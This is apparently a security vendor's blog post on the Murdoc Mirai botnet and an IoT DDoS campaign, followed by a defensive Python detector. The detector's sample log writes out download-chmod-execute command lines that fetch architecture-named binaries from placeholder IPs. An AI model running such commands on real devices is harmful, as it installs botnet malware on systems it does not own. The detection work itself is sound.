
Cybersecurity researchers have reported a new threat involving a campaign that exploits vulnerabilities in AVTECH IP cameras and Huawei HG532 routers. This campaign incorporates these devices into a Mirai botnet variant known as the Murdoc Botnet.

In July 2024, the campaign infected over 1,370 devices, with most of the infections reported in Malaysia, Mexico, Thailand, Indonesia, and Vietnam. The botnet combines exploitation of known security flaws with large-scale recruitment of compromised devices, illustrating the growing scale and sophistication of such attacks.

The botnet exploits vulnerabilities, specifically CVE-2024-7029, to compromise IoT devices. The attackers use these vulnerabilities to gain unauthorised access to a device and execute a shell script that downloads and runs the malware build matching the device's CPU architecture. The primary purpose of these attacks is to build a botnet capable of distributed denial-of-service (DDoS) attacks.

This activity follows a pattern seen in similar incidents, such as the gayfemboy Mirai botnet variant exploiting a security flaw in Four-Faith industrial routers in late 2024. The malicious actors were also previously found using CVE-2024-7029 to add AVTECH devices to a botnet, as revealed by Akamai in mid-2024, demonstrating a consistent pattern of exploiting IoT device vulnerabilities to build botnets for malicious purposes.

Since late 2024, a significant distributed denial-of-service (DDoS) attack campaign has targeted major Japanese corporations and banks. This campaign utilises an Internet of Things (IoT) botnet formed by exploiting device vulnerabilities and weak credentials. The attacks have also extended to organisations in the U.S., Bahrain, Poland, Spain, Israel, and Russia. Sectors affected include telecommunications, technology, hosting, cloud computing, banking, gaming, and financial services. According to the reports, over 55% of the compromised devices are in India, with significant numbers also in South Africa, Brazil, Bangladesh, and Kenya.

The botnet comprises malware variants derived from Mirai and BASHLITE, as reported by Trend Micro. The botnet issues commands that enable various DDoS attack methods, malware updates, and proxy services. The attack involves infiltrating IoT devices to deploy a loader malware, which then downloads the payload. This payload connects to a command-and-control (C2) server and awaits further instructions for DDoS attacks and other malicious activities. Monitoring for suspicious processes, events, and network traffic resulting from the execution of untrusted binaries or scripts is advised. Additionally, keeping devices updated and changing default usernames and passwords is recommended.
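As an added example (not from the original post or any vendor tooling), the following Python detector implements the monitoring advice above for the loader behaviour described: it parses process-execution log lines in a constructed, hypothetical format and flags a host when a binary fetched with wget or curl into a world-writable directory is then chmod'ed and executed, or when one host fetches several architecture-named binaries, a pattern common in Mirai-style loader scripts. The log format, hostnames, paths and IP addresses are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample of process-execution log lines (hypothetical format:
# "<timestamp> host=<h> pid=<n> cmd=<command line>"); not real telemetry.
SAMPLE_LOG = """\
2025-01-20T10:01:02Z host=cam-01 pid=812 cmd=wget http://198.51.100.7/bins/x86 -O /tmp/.x
2025-01-20T10:01:03Z host=cam-01 pid=813 cmd=chmod +x /tmp/.x
2025-01-20T10:01:04Z host=cam-01 pid=814 cmd=/tmp/.x
2025-01-20T10:01:05Z host=cam-01 pid=815 cmd=wget http://198.51.100.7/bins/arm7 -O /tmp/.x
2025-01-20T10:02:00Z host=rtr-02 pid=120 cmd=curl -s https://updates.example.net/firmware.bin -o /var/upgrade.bin
2025-01-20T10:02:30Z host=rtr-02 pid=121 cmd=wget http://203.0.113.9/mips -O /dev/shm/.m
2025-01-20T10:02:31Z host=rtr-02 pid=122 cmd=chmod 777 /dev/shm/.m
2025-01-20T10:02:32Z host=rtr-02 pid=123 cmd=/dev/shm/.m
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) pid=\d+ cmd=(?P<cmd>.+)$")
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b.*?\bhttps?://(?P<src>\S+).*?\s(?:-O|-o)\s+(?P<dst>\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+\S+\s+(?P<path>\S+)")
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")   # typical drop locations on IoT devices
ARCH_NAMES = ("x86", "x86_64", "arm", "arm5", "arm6", "arm7", "mips", "mipsel", "ppc", "sh4", "m68k")

def detect_loader_chains(log_text):
    """Return {host: [findings]} for hosts showing download-chmod-execute
    chains or multi-architecture binary downloads; clean hosts are omitted."""
    state = defaultdict(lambda: {"downloaded": {}, "chmod": set(), "archs": set()})
    findings = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue                      # ignore lines not in the expected format
        host, cmd = m.group("host"), m.group("cmd").strip()
        st = state[host]
        d = DOWNLOAD_RE.search(cmd)
        if d and d.group("dst").startswith(WRITABLE_DIRS):
            st["downloaded"][d.group("dst")] = d.group("src")   # remember path -> source URL
            name = d.group("src").rsplit("/", 1)[-1].lower()    # last URL path component
            if name in ARCH_NAMES:
                st["archs"].add(name)
            if len(st["archs"]) >= 2 and "multi-arch download" not in findings[host]:
                findings[host].append("multi-arch download")
            continue
        c = CHMOD_RE.search(cmd)
        if c and c.group("path") in st["downloaded"]:
            st["chmod"].add(c.group("path"))                    # downloaded file made executable
            continue
        parts = cmd.split()
        if parts and parts[0] in st["downloaded"] and parts[0] in st["chmod"]:
            findings[host].append(f"download-chmod-execute: {parts[0]} from {st['downloaded'][parts[0]]}")
    return dict(findings)
```

On the constructed sample both hosts are flagged; the legitimate firmware download on rtr-02 is not, because it lands outside the watched directories and is never chmod'ed or executed.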


CyberShelter provides innovative and modern cybersecurity products and niche services to individuals and organisations against all kinds of cyber threats.
